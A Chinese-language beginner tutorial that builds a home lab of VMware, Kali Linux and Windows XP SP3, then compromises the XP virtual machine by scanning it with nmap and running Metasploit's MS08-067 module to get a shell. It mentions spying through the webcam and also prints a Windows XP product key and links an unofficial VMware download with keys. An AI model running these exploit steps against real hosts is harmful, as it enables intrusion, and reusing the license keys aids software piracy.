使用KailLinux從"零"滲透一台WINXP主機
7 人贊了文章
0x00 本文概要
本文緊緊圍繞"黑"掉一台WINXP主機(自家的)為目的,從安裝Vmware這一款虛擬機軟體,再到在虛擬機裡頭安裝KailLinux和WindowsXP(這個就是被打的),最後使用KailLinux滲透WINXP主機,都很簡單的!零基礎都可以聽懂的,要是聽不懂私聊我或者評論留言,我會幫幫你解決問問題的!
0x01 安裝Vmware虛擬機軟體
vmware是一款虛擬機軟體,可以通過Vmware模擬具有完整硬體功能的計算機,簡單點說就是在一台計算機(實體)裡頭,模擬出很多計算機(虛擬機),這個章節就是教你安裝這一款虛擬機軟體
首先下載Vmware,先放上官網的下載鏈接
VMware Workstation Pro
在官網下載Vmware需要註冊才可以下載,比較麻煩,所以下面會附上國內下載站的下載鏈接,但還是建議各位從正版渠道下載
https://www.cr173.com/down.asp?id=68480
點擊以後即可進行下載,等待下載完畢後需要解壓縮
解壓完成後會有兩個文件,一個"Key.txt"一個"VMware-workstation-full-14.1.1-7528167.exe",前者是安裝密鑰後者是軟體安裝包
雙擊VMware-workstation-full-14.1.1-7528167.exe進行安裝,剛點完以後可能看不到安裝界面,需要等待幾十秒,就顯示出來安裝嚮導了
安裝位置不建議選在C盤,建議選在其他盤,要為了你的C盤心理健康著想
還是及
等待安裝結束後不要急得點擊"完成",現在去打開"key.txt"隨便找一條複製一下
隨便找
在Vmware安裝界面點擊"許可證",將KEY複製進去,完成後點擊"輸入"
最後點擊
在桌面上就可以找到剛安裝好的Vmware了,點開瞅瞅
已經成功安裝Vmware虛擬機,棒棒
0x02 下載KailLinux並安裝
Kail Linux是基於Debian的發行版本,設計用於數字取證的操作系統,內置了很多的滲透測試工具,深受滲透玩家喜愛
在Kail Linux官網可以下載,提供了很多版本,根據自己的PC是32bit或者64bit來判斷是下載哪個版本
Kali Linux Downloads
筆者的電腦系統是Windows10 64bit而且內存也夠用,所以選擇64bit版本,KailLinux官網提供了兩種下載方式一種是http下載一種是BT種子下載,看自己情況來選擇(我是隨便點)
下載速度還是可以的,不像某外網鏡像下載點,一秒3kb...,下載好了先去看看他!
現在進入Vmware安裝KailLinux,文字在注釋上哦!
這裡要注意一下KailLinux2018.2是基於Debian7,但是32位還是64位是看你下載的是32位還是64位,不要直接看圖 下一步 下一步 選擇...
這裡給虛擬機起個名字,看你喜歡啥,或者直接寫個KailLinux,"位置"那裡你自己選擇,最好別安C盤,C盤也是會傷心的,選好以後點擊下一步
在這裡可以自定義這個虛擬機的硬體,我嫌棄內存分的太少了,我去分個4G(其實1G夠用),我只是內存多想秀一秀,選好以後直接點擊"完成"
現在開始安裝KailLinux在虛擬機裡頭頭,首先點擊"開啟此虛擬機"
看起來是不是好厲害,上下可以切換選項,回車可以確定,咱們選擇圖形化安裝也就是"Graphical install"
按下小小的回車,小小的回車~~ 稍微等一等
這一步是選擇語言的,你喜歡啥語言就選啥語言吧,能看懂就行,選好以後點擊"Continue(繼續)"
選擇你的地區,這一步我有點不爽...
選鍵盤布局的,選擇英語比較好,選漢語也OK,沒人攔你!!! 選好點擊 "繼續"
進入不怎麼漫長的等待...
看心情隨便輸一個,直接點繼續業是可以的!
別管了,直接點繼續吧.. 我困了
這裡是設置root賬戶密碼的,root就是超級厲害的管理員賬戶,別忘了密碼啊!輸入好了點繼續就可以啦!
不用管,直接點擊"繼續"
還是點繼續!
不用管啦,直接點擊繼續
還是點擊繼續!
這裡要選"是"然後點擊繼續
正在安裝系統... 又是漫長的等待..
熱夏 你歸來~ 聽蟬!
這裡選擇否,因為咱為了滲透winxp是用不著需要現場下載的工具的,如果未來需要可以再設置的,簡單一點!
這裡選擇/dev/sda然後點擊"繼續"
成功啦,點擊繼續就可以啦!
等待重啟完成,就成功安裝KailLinux了!
用戶名是root,密碼就是你剛剛自己定義的!
點擊登陸!
恭喜,已經成功安裝好了KailLinux
0x03 安裝WindowsXP
WindowsXP(SP3)是啥我就不解釋了,這個也沒啥解釋的,大家都用過的... 這裡的鏡像是從MSDN下載的,鏈接如下
MSDN, 我告訴你我直接把下載鏈接copy出來,可以採用迅雷等軟體下載
ed2k://|file|zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_x14-80404.iso|630239232|CD0900AFA058ACB6345761969CBCBFF4|/
現在開始安裝WINXP在Vmware裡頭.... 我有點不想講了,這次就忽略一些細節吧.. 看圖
適用密鑰 7Q3GG-KFFDX-Y46QG-KFD3X-M4PBF
安裝成功,為了下面不做出一些騷操作,先把防火牆關了
0x04 使用KailLinux滲透WindowsXP主機
現在開始重頭戲了,首先進入KailLinux系統,點擊左側的控制台進入
輸入以下指令查看自己的網路配置
ip addr
咱們的IP是192.168.174.128
然後使用nmap掃描一下192.168.174.*這個網段有什麼仙人板板在線,指令如下
nmap -sP 192.168.174.* 相當於Ping掃描這個網段下的所有地址
掃出來好幾個地址,排除兩個vmware用的IP,排除一個網關(254)和我們自己的IP,剩下的那個就是WINXP主機的IP,也就是
192.168.174.129 是WINXP的IP
現在瞅瞅這個IP上的機器是啥系統 假裝咱們不知道
nmap -O 192.168.174.129
掃描結果出來了!
發現共享服務445埠是開著的,系統是WINXP2或者WINXP3,可以使用MS08-067漏洞來搞進去
進入漏洞檢測(利用)工具Metasploit指令為
msfconsole
搜索MS08-067利用工具指令如下
search MS08-067
已經搜索出來了,紅圈那一串就是工具的地址,現在使用這個負載,指令如下
use explot/windows/smb/ms08_067_netapi
成功進入,查看一下需要設置什麼東西,指令如下
show options
RHOST 目標的IP
RPORT 目標共享服務埠,不需要設置
Target 目標的系統版本
也就是說咱們只需要設置RHOST(目標的IP)和設置目標系統版本就OK,先設置下要攻擊機器的IP,指令如下
set rhost 192.168.174.129
接下來設置一下目標的系統版本,先瞅瞅有點啥版本,然後設置,瞅瞅有啥版本的命令如下
show targets
發現有好多東西,不過咱們知道是WINXP SP3簡體版本,序號為34,設置一下,指令如下
set target 34
設置成功,再瞅瞅是不是還有啥沒設置的,查看配置指令如下
show options
發現該設置的全設置了,也就是可以發動exploit了!
開始攻擊可以輸入exploit或者run都一樣,看心情喜歡哪個輸入哪個
開始按回車!!!!
成功拿到了Shell,滲透成功!!
來給被攻擊的機器截個圖?指令如下
screenshot
輸入了以後就截圖到root目錄下了,可以去瞅瞅了
除了截圖還能什麼?什麼都可以啊,相當於完全控制了這台機器,偷偷打開攝像頭拍照,或者是刪除東西,搞個遠程桌面出來都是可以的,比如這裡查看一下被攻擊機器的網路設置,指令如下!
ipconfig
這些就是被攻擊機器的網路設置,那麼就到這裡了,好累呀!
0x05 一點題外話
本文的目的主要是教會零基礎的玩家怎麼安虛擬機,滲透學習倒是其次,所以示範用的是老掉牙的MS08067,如果各位覺得哪裡有問題,或者是哪裡不會可以評論留言或者私聊,理解萬歲!
我好餓t呀 2018.8.27 21點07分
推薦閱讀: